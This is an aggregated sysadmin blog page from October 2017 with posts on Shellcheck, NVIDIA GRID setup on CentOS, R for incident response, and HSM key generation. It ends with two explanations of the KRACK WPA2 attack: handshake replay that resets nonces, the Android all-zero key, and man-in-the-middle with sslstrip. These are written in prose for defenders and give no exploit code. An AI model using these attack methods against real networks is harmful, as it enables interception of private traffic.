Planet SysAdmin


October 19, 2017

Chris Siebenmann

Using Shellcheck is good for me

A few months ago I wrote an entry about my views on Shellcheck where I said that I found it too noisy to be interesting or useful to me. Well, you know what, I have to take that back. What happened is that as I've been writing various shell scripts since then, I've increasingly found myself reaching for Shellcheck as a quick syntax and code check that I could use without trying to run my script. Shellcheck is a great tool for this, and as a bonus it can suggest some simplifications and improvements.

(Perhaps there are other programs that can do the same sort of checking that shellcheck does, but if so I don't think I've run across them yet. The closest I know of is shfmt.)

Yes, Shellcheck is what you could call nitpicky (it's a linter, not just a code checker, so part of its job is making style judgments). But going along with it doesn't hurt (I've yet to find a situation where a warning was actively wrong) and it's easier to spot real problems if 'shellcheck <script>' is otherwise completely silent. I can live with the cost of sprinkling a bunch of quotes over the use of shell variables, and the result is more technically correct even if it's unlikely to ever make a practical difference.
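As a concrete (and hypothetical) illustration of the class of bug behind Shellcheck's most common quoting warning (SC2086, "Double quote to prevent globbing and word splitting"), consider what word splitting does to an unquoted variable holding a filename with a space; the filename here is made up for the example:

```shell
#!/bin/sh
# Create a file whose name contains a space.
dir=$(mktemp -d)
touch "$dir/my report.txt"
f="$dir/my report.txt"

# Unquoted: $f undergoes word splitting, so ls is handed two
# arguments ("…/my" and "report.txt"), neither of which exists.
ls $f 2>/dev/null || echo "unquoted: failed"

# Quoted, as Shellcheck suggests: the name stays intact.
ls "$f" >/dev/null && echo "quoted: ok"
```

Running `shellcheck` on this script flags the `ls $f` line; fixing it is exactly the sort of sprinkling-of-quotes the tool pushes you toward.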

In other words, using Shellcheck is good for me and my shell scripts even if it can be a bit annoying. Technically more correct is still 'more correct', and Shellcheck is right about the things it complains about regardless of what I think about it.

(With that said, I probably wouldn't bother using Shellcheck and fixing its complaints about unquoted shell variable usage if that was all it did. The key to its success here is that it adds value over and above its nit-picking; that extra value pushes me to use it, and using it pushes me to do the right thing by fixing my variable quoting to be completely correct.)

by cks at October 19, 2017 03:56 AM

October 18, 2017

Sean's IT Blog

Configuring a Headless CentOS Virtual Machine for NVIDIA GRID vGPU #blogtober

When IT administrators think of GPUs, the first thing that comes to mind for many is gaming.  But GPUs also have business applications.  They’re mainly found in high end workstations to support graphics intensive applications like 3D CAD and medical imaging.

But GPUs will have other uses in the enterprise.  Many of the emerging technologies, such as artificial intelligence and deep learning, utilize GPUs to perform compute operations.  These will start finding their way into the data center, either as part of line-of-business applications or as part of IT operations tools.  This could also allow the business to utilize GRID environments after hours for other forms of data processing.

This guide will show you how to build headless virtual machines that can take advantage of NVIDIA GRID vGPU for GPU compute and CUDA.  In order to do this, you will need to have a Pascal Series NVIDIA Tesla card such as the P4, P40, or P100 and the GRID 5.0 drivers.  The GRID components will also need to be configured in your hypervisor, and you will need to have the GRID drivers for Linux.

I’ll be using CentOS 7.x for this guide.  My base CentOS configuration is a minimal install with no graphical shell and a few additional packages like Nano and Open VM Tools.  I use Bob Plankers’ guide for preparing my VM as a template.

The steps for setting up a headless CentOS VM with GRID are:

  1. Deploy your CentOS VM.  This can be from an existing template or installed from scratch.  This VM should not have a graphical shell installed, or it should be in a run mode that does not execute the GUI.
  2. Attach a GRID profile to the virtual machine by adding a shared PCI device in vCenter.  The selected profile will need to be one of the Virtual Workstation profiles, and these all end with a Q.
  3. GRID requires a 100% memory reservation.  When you add an NVIDIA GRID shared PCI device, there will be an associated prompt to reserve all system memory.
  4. Update the VM to ensure all applications and components are the latest version using the following command:
    yum update -y
  5. In order to build the GRID driver for Linux, you will need to install a few additional packages.  Install these packages with the following command:
    yum install -y epel-release dkms libstdc++.i686 gcc kernel-devel 
  6. Copy the Linux GRID drivers to your VM using a tool like WinSCP.  I generally place the files in /tmp.
  7. Make the driver package executable with the following command:
    chmod +x NVIDIA-Linux-x86_64-384.73-grid.run
  8. Execute the driver package.  When we execute this, we will also add the --dkms flag to enable Dynamic Kernel Module Support.  This will enable the system to automatically recompile the driver whenever a kernel update is installed.  The command to run the driver install is:
    bash ./NVIDIA-Linux-x86_64-384.73-grid.run --dkms
  9. When prompted, register the kernel module sources with DKMS by selecting Yes and pressing Enter.
  10. You may receive an error about the installer not being able to locate the X Server path.  This is safe to ignore; select OK.
  11. Install the 32-bit Compatibility Libraries by selecting Yes and pressing Enter.
  12. At this point, the installer will start to build the DKMS module and install the driver.  
  13. After the install completes, you will be prompted to use the nvidia-xconfig utility to update your X Server configuration.  X Server should not be installed because this is a headless machine, so select No and press Enter.
  14. The install is complete.  Press Enter to exit the installer.
  15. To validate that the NVIDIA drivers are installed and running properly, run nvidia-smi to get the status of the video card.  
  16. Next, we’ll need to configure GRID licensing.  We’ll need to create the GRID licensing file from a template supplied by NVIDIA with the following command:
    cp  /etc/nvidia/gridd.conf.template  /etc/nvidia/gridd.conf
  17. Edit the GRID licensing file using the text editor of your choice.  I prefer Nano, so the command I would use is:
    nano  /etc/nvidia/gridd.conf
  18. Fill in the ServerAddress and BackupServerAddress fields with the fully-qualified domain name or IP addresses of your licensing servers.
  19. Set the FeatureType to 2 to configure the system to retrieve a Virtual Workstation license.  The Virtual Workstation license is required to support the CUDA features for GPU Compute.
  20. Save the license file.
  21. Restart the GRID Service with the following command:
    service nvidia-gridd restart
  22. Validate that the machine retrieved a license with the following command:
    grep gridd /var/log/messages
  23. Download the NVIDIA CUDA Toolkit.
    wget https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run
  24. Make the toolkit installer executable.
    chmod +x cuda_9.0.176_384.81_linux-run
  25. Execute the CUDA Toolkit installer.
    bash cuda_9.0.176_384.81_linux-run
  26. Accept the EULA.
  27. You will be prompted to download the CUDA Driver.  Press N to decline the new driver. This driver does not match the NVIDIA GRID driver version, and it will break the NVIDIA setup.  The GRID driver in the VM has to match the GRID software that is installed in the hypervisor.
  28. When prompted to install the CUDA 9.0 toolkit, press Y.
  29. Accept the Default Location for the CUDA toolkit.
  30. When prompted to create a symlink at /usr/local/cuda, press Y.
  31. When prompted to install the CUDA 9.0 samples, press Y.
  32. Accept the default location for the samples.
  33. Reboot the virtual machine.
  34. Log in and run nvidia-smi again.  Validate that you get the table output similar to step 15.  If you do not receive this, and you get an error, it means that you likely installed the driver that is included with the CUDA toolkit.  If that happens, you will need to start over.
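If you're building more than one of these VMs, the licensing configuration in steps 16 through 19 is also easy to script.  The sketch below operates on a throwaway copy of the template so it's runnable anywhere; the license server names are placeholders, and on a real VM you'd work against /etc/nvidia/gridd.conf directly:

```shell
#!/bin/sh
# Sketch of steps 16-19: copy the NVIDIA-supplied template and fill
# in the licensing fields.  CONF_DIR stands in for /etc/nvidia, and
# the server names below are hypothetical placeholders.
CONF_DIR=$(mktemp -d)
LICENSE_SERVER="grid-lic01.example.com"
BACKUP_SERVER="grid-lic02.example.com"

# Fake template with the fields commented out, roughly as shipped.
cat > "$CONF_DIR/gridd.conf.template" <<'EOF'
#ServerAddress=
#BackupServerAddress=
#FeatureType=0
EOF

# Step 16: create gridd.conf from the template.
cp "$CONF_DIR/gridd.conf.template" "$CONF_DIR/gridd.conf"

# Steps 17-19: set the license servers, and FeatureType=2 to request
# a Virtual Workstation license (required for CUDA/GPU compute).
sed -i \
    -e "s|^#\?ServerAddress=.*|ServerAddress=$LICENSE_SERVER|" \
    -e "s|^#\?BackupServerAddress=.*|BackupServerAddress=$BACKUP_SERVER|" \
    -e "s|^#\?FeatureType=.*|FeatureType=2|" \
    "$CONF_DIR/gridd.conf"

grep -E 'ServerAddress|FeatureType' "$CONF_DIR/gridd.conf"
```

On the real VM you would follow this with `service nvidia-gridd restart` and the `grep gridd /var/log/messages` check from step 22.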

At this point, you have a headless VM with the NVIDIA Drivers and CUDA Toolkit installed.  So what can you do with this?  Just about anything that requires CUDA.  You can experiment with deep learning frameworks like TensorFlow, build virtual render nodes for tools like Blender, or even use MATLAB for GPU compute.


by seanpmassey at October 18, 2017 04:04 PM

Chris Siebenmann

I still like Python and often reach for it by default

Various local events recently made me think a bit about the future of Python at work. We're in a situation where a number of our existing tools will likely get drastically revised or entirely thrown away and replaced, and that raises local issues with Python 3 as well as questions of whether I should argue for changing our list of standard languages. I have some technical views on the answer, but thinking through this has made me realize something on a more personal level. Namely, I still like Python and it's my go-to default language for a number of things.

I'm probably always going to be a little bit grumpy about the whole transition toward Python 3, but that in no way erases the good parts of Python. Despite the baggage around it, Python 3 has its own good side and I remain reasonably enthused about it. Writing modest little programs in Python has never been a burden; the hard parts are never from Python, they're from figuring out things like data representation and that's the same challenge in any language. In the mean time, Python's various good attributes make it pretty plastic and easily molded as I'm shaping and re-shaping my code as I figure out more of how I want to do things.

(In other words, experimenting with my code is generally reasonably easy. When I may completely change how I approach a problem between my first draft and my second attempt, this is quite handy.)

Also, Python makes it very easy to do string-bashing and to combine it with basic Unix things. This describes a lot of what I do, which means that Python is a low-overhead way of writing something that is much like a shell script but that's more structured, better organized, and expresses its logic more clearly and directly (because it's not caught up in the Turing tarpit of Bourne shell).

(This sort of 'better shell script' need comes up surprisingly often.)

My tentative conclusion about what this means for me is that I should embrace Python 3, specifically I should embrace it for new work. Despite potential qualms for some things, new program that I write should be in Python 3 unless there's a strong reason they can't be (such as having to run on a platform with an inadequate or missing Python 3). The nominal end of life for Python 2 is not all that far off, and if I'm continuing with Python in general (and I am), then I should be carrying around as little Python 2 code as possible.

by cks at October 18, 2017 07:00 AM

HolisticInfoSec.org

McRee added to ISSA's Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:35 AM

toolsmith #128 - DFIR Redefined: Deeper Functionality for Investigators with R - Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would be helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from Secure360.org's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us: we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With just a few lines of R, investigators may be able to reach conclusions more quickly.
All the code described in the post can be found on my GitHub.

Have you been pwned?

I covered this scenario in an earlier post; I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principles is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to this is TraMineR: Trajectory Miner for R. This package is for mining, describing and visualizing sequences of states or events, and more generally discrete sequence data. Its primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow, though, the project page fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from the above mentioned paper. Figure 1 shows text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.


A screen capture of the resulting sunburst also follows as Figure 4.

Figure 4


How do your potential attackers feel, or can you identify an attacker via sentiment analysis?

Do certain adversaries or adversarial communities use social media? Yes
As such, can social media serve as an early warning system, if not an actual sensor? Yes
Are certain adversaries, at times, so unaware of OpSec on social media that you can actually locate them or correlate against other geo data? Yes
Some excellent R code to assess Twitter data with includes Jeff Gentry's twitteR and rtweet to interface with the Twitter API.
  • twitteR: provides access to the Twitter API. Most functionality of the API is supported, with a bias towards API calls that are more useful in data analysis as opposed to daily interaction.
  • rtweet: R client for interacting with Twitter’s REST and stream APIs.
The code and concepts here are drawn directly from Michael Levy, PhD UC Davis: Playing With Twitter.
Here's the scenario: DDoS attacks from hacktivist or chaos groups.
Attacker groups often use associated hashtags and handles and the minions that want to be "part of" often retweet and use the hashtag(s). Individual attackers either freely give themselves away, or often become easily identifiable or associated, via Twitter. As such, here's a walk-through of analysis techniques that may help identify or better understand the motives of certain adversaries and adversary groups. I don't use actual adversary handles here, for obvious reasons. I instead used a DDoS news cycle and journalist/bloggers handles as exemplars. For this example I followed the trail of the WireX botnet, comprised mainly of Android mobile devices utilized to launch a high-impact DDoS extortion campaign against multiple organizations in the travel and hospitality sector in August 2017. I started with three related hashtags: 
  1. #DDOS 
  2. #Android 
  3. #WireX
We start with all related Tweets by day and time of day. The code is succinct and efficient, as noted in Figure 5.

Figure 5
The result is a pair of graphs color coded by tweets and retweets per Figure 6.

Figure 6

This gives you an immediate feel for spikes in interest by day as well as time of day, particularly with attention to retweets.
Want to see what platforms potential adversaries might be tweeting from? No problem, code in Figure 7.
Figure 7

The result in the scenario ironically indicates that the majority of related tweets using our hashtags of interest are coming from Androids per Figure 8. :-)


Figure 8
Now to the analysis of emotional valence, or "the intrinsic attractiveness (positive valence) or averseness (negative valence) of an event, object, or situation."
orig$text[which.max(orig$emotionalValence)] tells us that the most positive tweet is "A bunch of Internet tech companies had to work together to clean up #WireX #Android #DDoS #botnet."
orig$text[which.min(orig$emotionalValence)] tells us that "Dangerous #WireX #Android #DDoS #Botnet Killed by #SecurityGiants" is the most negative tweet.
Interesting right? Almost exactly the same message, but very different valence.
How do we measure emotional valence changes over the day? Four lines later...
filter(orig, mday(created) == 29) %>%
  ggplot(aes(created, emotionalValence)) +
  geom_point() + 
  geom_smooth(span = .5)
...and we have Figure 9, which tells us that most tweets about WireX were emotionally neutral on 29 AUG 2017; around 0800 we saw one positive tweet, with more negative tweets overall in the morning.

Figure 9
Another line of questioning to consider: which tweets are more often retweeted, positive or negative? As you can imagine with information security focused topics, negativity wins the day.
Three lines of R...
ggplot(orig, aes(x = emotionalValence, y = retweetCount)) +
  geom_point(position = 'jitter') +
  geom_smooth()
...and we learn just how popular negative tweets are in Figure 10.

Figure 10
There is a cluster of emotionally neutral retweets, two positive retweets, and a load of negative retweets. This type of analysis can quickly lead to a good feel for the overall sentiment of an attacker collective, particularly one with less opsec and more desire for attention via social media.
In Part 2 of DFIR Redefined: Deeper Functionality for Investigators with R we'll explore this scenario further via sentiment analysis and Twitter data, as well as Fast Frugal Trees (decision trees) for prioritizing criticality.
Let me know if you have any questions on the first part of this series via @holisticinfosec or russ at holisticinfosec dot org.
Cheers...until next time. 

by Russ McRee (noreply@blogger.com) at October 18, 2017 04:14 AM

October 17, 2017

The Lone Sysadmin

Advice On Downgrading Adobe Flash

VMware has a KB article out (linked below) about the Adobe Flash crashes that happen if you’re running the latest version of Flash (27.0.0.170). A lot of us were caught off guard recently when our PCs updated themselves and we couldn’t get into our VMware vSphere environments. The VMware KB article suggests downgrading your Flash […]

The post Advice On Downgrading Adobe Flash appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at October 17, 2017 03:59 PM

Everything Sysadmin

Final reminder: NYCDevOps tonight: "Storing Secrets in the Cloud"

Don't miss this meeting tonight!

  • Topic: Storing Secrets in Cloud based Key Management Services
  • Speaker: Dan O'Boyle, Stack Overflow, Inc.
  • Date: Tuesday, October 17, 2017
  • Time: 6:30-9:30 PM
  • Location: Stack Overflow HQ, 110 William St, 28th floor, NY, NY
  • https://www.meetup.com/nycdevops/events/241803854/

The A/C is fixed! Don't miss this cool event! Full details and RSVP.

by Tom Limoncelli at October 17, 2017 02:30 PM

Chris Siebenmann

My current grumpy view on key generation for hardware crypto keys

I tweeted:

My lesson learned from the Infineon HSM issue is to never trust a HSM to generate keys, just to store them. Generate keys on a real machine.

In my usual manner, this is perhaps overstated for Twitter. So let's elaborate on it a bit, starting with the background.

When I first heard about the Infineon TPM key generation issue (see also the technical blog article), I wasn't very concerned, since we don't have sophisticated crypto smartcards or electronic ID cards or the like. Then I found out that some Yubikeys are affected and got grumpy. When I set up SSH keys on my Yubikey 4, I had the Yubikey itself generate the RSA key involved. After all, why not? That way the key was never exposed on my Linux machine, even if the practical risks were very low. Unfortunately, this Infineon issue now shows the problem in that approach.

In theory, a hardware key like the Yubikey is a highly secure physical object that just works. In practice they are little chunks of inexpensive hardware that run some software, and there's nothing magical about that software; like all software, it's subject to bugs and oversights. This means that in practice, there is a tradeoff about where you generate your keys. If you generate them inside the HSM instead of on your machine, you don't have to worry about your machine being compromised or the quality of your software, but you do have to worry about the quality of the HSM's software (and related to that, the quality of the random numbers that the HSM can generate).

(Another way to put this is that a HSM is just a little computer that you can't get at, running its own collection of software on some hardware that's often pretty tiny and limited.)

As a practical matter, the software I'd use for key generation on my Linux machine is far more scrutinized (especially these days) and thus almost certainly much more trustworthy than the opaque proprietary software inside a HSM. The same is true for /dev/urandom on a physical Linux machine such as a desktop or a laptop. It's possible that a HSM could do a better job on both fronts, but it's extremely likely that my Linux machine is good enough on both. That leaves machine compromise, which is a very low probability issue for most people. And if you're a bit worried, there are also mitigation strategies for the cautious, starting with disconnecting from the network, turning off swap, generating keys into a tmpfs, and then rebooting your machine afterward.
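For the cautious local-generation approach described above, a rough sketch might look like the following.  Note the assumptions: openssl is just one example of a well-scrutinized local tool, and the tmpfs mount and token-import steps are left as comments because they need root and depend on which token and tooling you actually use:

```shell
#!/bin/sh
# Sketch: generate the key on a normal Linux machine, keep it off
# persistent storage, then load it into the hardware token.
#
# On a real machine you'd first disconnect from the network, turn
# off swap (swapoff -a), and generate into an actual tmpfs, e.g.:
#   mount -t tmpfs -o size=1m tmpfs /mnt/keygen
# Here a temporary directory stands in so the sketch is runnable.
KEYDIR=$(mktemp -d)

# Generate a 2048-bit RSA key with a heavily scrutinized local tool.
openssl genpkey -algorithm RSA -pkeyopt rsa_keygen_bits:2048 \
    -out "$KEYDIR/key.pem" 2>/dev/null

# Sanity-check what we produced before importing it into the token.
openssl rsa -in "$KEYDIR/key.pem" -check -noout

# At this point you'd import key.pem into the Yubikey (with ykman,
# gpg, or similar, depending on how you use the token), then destroy
# the on-disk copy and reboot the machine afterward.
shred -u "$KEYDIR/key.pem"
```

The reboot at the end matters because the key material may linger in kernel memory and filesystem caches even after the file is gone.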

Once upon a time (only a year ago), I thought that the balance of risks made it perfectly okay to generate RSA keys in the Yubikey HSM. It turns out that I was wrong in practice, and now I believe that I was wrong in general for me and most people. I now feel that the balance of risks strongly favour trusting the HSM more or less as little as possible, which means only trusting it to hold keys securely and perhaps limit their use to only when the HSM is unlocked or the key usage is approved.

(This is actually giving past me too much credit. Past me didn't even think about the risk that the Yubikey software could have bugs; past me just assumed that of course it didn't and therefore was axiomatically better than generating keys on the local machine and moving them into the HSM. After all, who would sell a HSM that didn't have very carefully audited and checked software? I really should have known better, because the answer is 'nearly everyone'.)

PS: If you have a compliance mandate that keys can never be created on a general-purpose machine in any situation where they might make it to the outside world, you have two solutions (at least). One of them involves hope and then perhaps strong failure, as here with Infineon, and one of them involves a bunch of work, some persuasion, and perhaps physically destroying some hardware afterward if you're really cautious.

by cks at October 17, 2017 04:18 AM

October 16, 2017

ma.ttias.be

Compile PHP from source: error: utf8_mime2text() has new signature

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

It's been a while, but I had to recompile a PHP from source and ran into this problem during the ./configure stage.

$ ./configure
...
checking for IMAP Kerberos support... no
checking for IMAP SSL support... yes
checking for utf8_mime2text signature... new
checking for U8T_DECOMPOSE...
configure: error: utf8_mime2text() has new signature, but U8T_CANONICAL is missing.
This should not happen. Check config.log for additional information.

To resolve that utf8_mime2text() has new signature, but U8T_CANONICAL is missing error, on CentOS you can install the libc-client-devel package.

$ yum install libc-client-devel

After that, your ./configure should go through.

The post Compile PHP from source: error: utf8_mime2text() has new signature appeared first on ma.ttias.be.

by Mattias Geniar at October 16, 2017 08:30 PM

Errata Security

Some notes on the KRACK attack

This is my interpretation of the KRACK attacks paper that describes a way of decrypting encrypted WiFi traffic with an active attack.

tl;dr: Wow. Everyone needs to be afraid. (Well, worried -- not panicked.) It means in practice, attackers can decrypt a lot of wifi traffic, with varying levels of difficulty depending on your precise network setup. My post last July about the DEF CON network being safe was in error.

Details

This is not a crypto bug but a protocol bug (a pretty obvious and trivial protocol bug).

When a client connects to the network, the access-point will at some point send random "key" data to use for encryption. Because this packet may be lost in transmission, it can be repeated many times.

What the hacker does is just repeatedly send this packet, potentially hours later. Each time it does so, it resets the "keystream" back to the starting conditions. The obvious patch that device vendors will make is to accept only the first such packet received and ignore all the duplicates.

At this point, the protocol bug becomes a crypto bug. We know how to break crypto when we have two keystreams from the same starting position. It's not always reliable, but reliable enough that people need to be afraid.

Android, though, is the biggest danger. Rather than simply replaying the packet, a packet with key data of all zeroes can be sent. This allows attackers to set up a fake WiFi access-point and man-in-the-middle all traffic.

In a related case, the access-point/base-station can sometimes also be attacked, affecting the stream sent to the client.

Not only is sniffing possible, but in some limited cases, injection. This allows the traditional attack of adding bad code to the end of HTML pages in order to trick users into installing a virus.

This is an active attack, not a passive attack, so in theory, it's detectable.

Who is vulnerable?

Everyone, pretty much.

The hacker only needs to be within range of your WiFi. Your neighbor's teenage kid is going to be downloading and running the tool in order to eavesdrop on your packets.

The hacker doesn't need to be logged into your network.

It affects all WPA1/WPA2, the personal one with passwords that we use in home, and the enterprise version with certificates we use in enterprises.

It can't defeat SSL/TLS or VPNs. Thus, if you feel your laptop is safe surfing the public WiFi at airports, then your laptop is still safe from this attack. With Android, it does allow running tools like sslstrip, which can fool many users.

Your home network is vulnerable. Many devices will be using SSL/TLS, so are fine, like your Amazon Echo, which you can continue to use without worrying about this attack. Other devices, like your Philips lightbulbs, may not be so protected.

How can I defend myself?

Patch.

More to the point, measure your current vendors by how long it takes them to patch. Throw away gear by those vendors that took a long time to patch and replace it with vendors that took a short time.

High-end access-points that contain "WIPS" (WiFi Intrusion Prevention Systems) features should be able to detect this and block vulnerable clients from connecting to the network (once the vendor upgrades the systems, of course). Even low-end access-points, like the $30 ones you get for home, can easily be updated to prevent packet sequence numbers from going back to the start (i.e. from the keystream resetting back to the start).

At some point, you'll need to run the attack against yourself, to make sure all your devices are secure. Since you'll be constantly allowing random phones to connect to your network, you'll need to check their vulnerability status before connecting them. You'll need to continue doing this for several years.

Of course, if you are using SSL/TLS for everything, then your danger is mitigated. This is yet another reason why you should be using SSL/TLS for internal communications.

Most security vendors will add things to their products/services to defend you. While valuable in some cases, it's not a defense. The defense is patching the devices you know about, and preventing vulnerable devices from attaching to your network.

If I remember correctly, DEF CON uses Aruba. Aruba contains WIPS functionality, which means by the time DEF CON rolls around again next year, they should have the feature to deny vulnerable devices from connecting, and specifically to detect an attack in progress and prevent further communication.

However, for an attacker near an Android device using a low-powered WiFi, it's likely they will be able to conduct man-in-the-middle without any WIPS preventing them.


by Robert Graham (noreply@blogger.com) at October 16, 2017 07:27 PM

Cryptography Engineering

Falling through the KRACKs

The big news in crypto today is the KRACK attack on WPA2 protected WiFi networks. Discovered by Mathy Vanhoef and Frank Piessens at KU Leuven, KRACK (Key Reinstallation Attack) leverages a vulnerability in the 802.11i four-way handshake in order to facilitate decryption and forgery attacks on encrypted WiFi traffic.

The paper is here. It’s pretty easy to read, and you should.

I don’t want to spend much time talking about KRACK itself, because the vulnerability is pretty straightforward. Instead, I want to talk about why this vulnerability continues to exist so many years after WPA was standardized. And separately, to answer a question: how did this attack slip through, despite the fact that the 802.11i handshake was formally proven secure?

A quick TL;DR on KRACK

For a detailed description of the attack, see the KRACK website or the paper itself. Here I’ll just give a brief, high level description.

The 802.11i protocol (also known as WPA2) includes two separate mechanisms to ensure the confidentiality and integrity of your data. The first is a record layer that encrypts WiFi frames, to ensure that they can’t be read or tampered with. This encryption is (generally) implemented using AES in CCM mode, although there are newer implementations that use GCM mode, and older ones that use RC4-TKIP (we’ll skip these for the moment.)

The key thing to know is that AES-CCM (and GCM, and TKIP) is a stream cipher, which means it’s vulnerable to attacks that re-use the same key and “nonce”, also known as an initialization vector. 802.11i deals with this by constructing the initialization vector using a “packet number” counter, which initializes to zero after you start a session, and always increments (up to 2^48, at which point rekeying must occur). This should prevent any nonce re-use, provided that the packet number counter can never be reset.
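The nonce-reuse consequence is easy to demonstrate. The following is a minimal, illustrative sketch — a toy CTR-style stream cipher built from SHA-256, not 802.11's actual CCMP, with all keys and messages made up for the example — showing that once the packet-number counter resets, two frames share a keystream, and XORing their ciphertexts leaks the XOR of the plaintexts without any knowledge of the key:

```python
import hashlib

def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: hash key || nonce || counter, CTR-mode style."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream cipher: XOR plaintext with the keystream."""
    ks = keystream(key, nonce, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))

key = b"session-key"
nonce = (0).to_bytes(6, "big")  # packet number, reset to zero by the attack

# Two different frames encrypted under the SAME key and nonce.
c1 = encrypt(key, nonce, b"attack at dawn!!")
c2 = encrypt(key, nonce, b"retreat at dusk!")

# Same key + nonce => same keystream, so the keystream cancels out:
# c1 XOR c2 equals p1 XOR p2, with no key material needed.
xor = bytes(a ^ b for a, b in zip(c1, c2))
assert xor == bytes(a ^ b for a, b in zip(b"attack at dawn!!", b"retreat at dusk!"))
```

From the XOR of two plaintexts, classic crib-dragging techniques recover the actual contents, which is why the counter must never repeat under the same key.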

The second mechanism you should know about is the “four way handshake” between the AP and a client (supplicant) that’s responsible for deriving the key to be used for encryption. The particular message KRACK cares about is message #3, which causes the new key to be “installed” (and used) by the client.

The four-way handshake. Client is on the left, AP is on the right. (courtesy Wikipedia, used under CC).

The key vulnerability in KRACK (no pun intended) is that the acknowledgement to message #3 can be blocked by adversarial nasty people.* When this happens, the AP re-transmits this message, which causes (the same) key to be reinstalled into the client (note: see update below*). This doesn’t seem so bad. But as a side effect of installing the key, the packet number counters all get reset to zero. (And on some implementations like Android 6, the key gets set to zero — but that’s another discussion.)

The implication is that by forcing the AP to replay this message, an adversary can cause a connection to reset nonces and thus cause keystream re-use in the stream cipher. With a little cleverness, this can lead to full decryption of traffic streams. And that can lead to TCP hijacking attacks. (There are also direct traffic forgery attacks on GCM and TKIP, but this as far as we go for now.)

How did this get missed for so long?

If you’re looking for someone to blame, a good place to start is the IEEE. To be clear, I’m not referring to the (talented) engineers who designed 802.11i — they did a pretty good job under the circumstances. Instead, blame IEEE as an institution.

One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they’re hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications — you’ll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck.

The IEEE has been making a few small steps to ease this problem, but they’re hyper-timid incrementalist bullshit. There’s an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they’ve been public for six months — coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software.

This whole process is dumb and — in this specific case — probably just cost industry tens of millions of dollars. It should stop.

The second problem is that the IEEE standards are poorly specified. As the KRACK paper points out, there is no formal description of the 802.11i handshake state machine. This means that implementers have to implement their code using scraps of pseudocode scattered around the standards document. It happens that this pseudocode leads to the broken implementation that enables KRACK. So that’s bad too.

